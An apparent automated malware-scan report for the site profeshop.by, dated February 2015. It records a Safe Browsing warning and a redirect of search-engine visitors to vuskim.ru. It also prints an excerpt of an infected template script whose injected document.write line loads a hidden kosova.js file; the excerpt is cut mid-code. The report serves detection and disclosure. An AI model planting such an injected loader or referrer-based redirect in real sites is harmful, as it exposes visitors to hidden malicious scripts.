Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=profeshop.by
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://profeshop.by/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: profeshop.by Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Feb 2015 21:23:06 GMT Location: http://vuskim.ru/in.cgi?4 Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://profeshop.by/ | 500 Internal Server Error Content-Length: 2370 Content-Type: text/html | clean |
http://profeshop.by/templates/profeshopby/jquery.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://profeshop.by/templates/profeshopby/script.js | 200 OK Content-Length: 6541 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function() { var m = document.uniqueID && document.compatMode && !window.XMLHttpRequest && document.execCommand; try { if (!!m) { m('BackgroundImageCache', false, true); } } catch (oh) { }; var u = navigator.userAgent.toLowerCase(); var is = function(t) { return (u.indexOf(t) != -1) }; jQuery('html').addClass([(!(/opera|webtv/i.test(u)) && /msie (\d)/.test(u)) ? ('ie ie' + RegExp.$1) : is('firefox/2' b.mouseup(function() { var b = jQuery(this); if (!b.hasClass('active')) b.parent().removeClass('active'); }); }); } jQuery(function() { artButtonSetup("art-button"); }); jQuery(function() { artButtonSetup("button"); artButtonSetup("readon"); artButtonSetup("readmore"); }); ;document.write("<scr"+"ipt src='/components/com_sobi2/images/kosova.js'><"+"/script>"); Antivirus reports:
| ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12791 Content-Type: application/javascript | clean |
http://userapi.com/js/api/openapi.js?41 | 200 OK Content-Length: 64063 Content-Type: application/x-javascript | clean |
http://profeshop.by/test404page.js | HTTP/1.1 302 Found Cache-Control: max-age=2592000 Connection: close Date: Tue, 24 Feb 2015 21:23:08 GMT Location: http://vuskim.ru/in.cgi?4 Server: Apache Content-Length: 209 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 26 Mar 2015 21:23:08 GMT | clean |
http://vuskim.ru/in.cgi?4 | 500 Can't connect to vuskim.ru:80 Content-Length: 184 Content-Type: text/plain | clean |
http://vuskim.ru/test404page.js | 500 Can't connect to vuskim.ru:80 Content-Length: 184 Content-Type: text/plain | clean |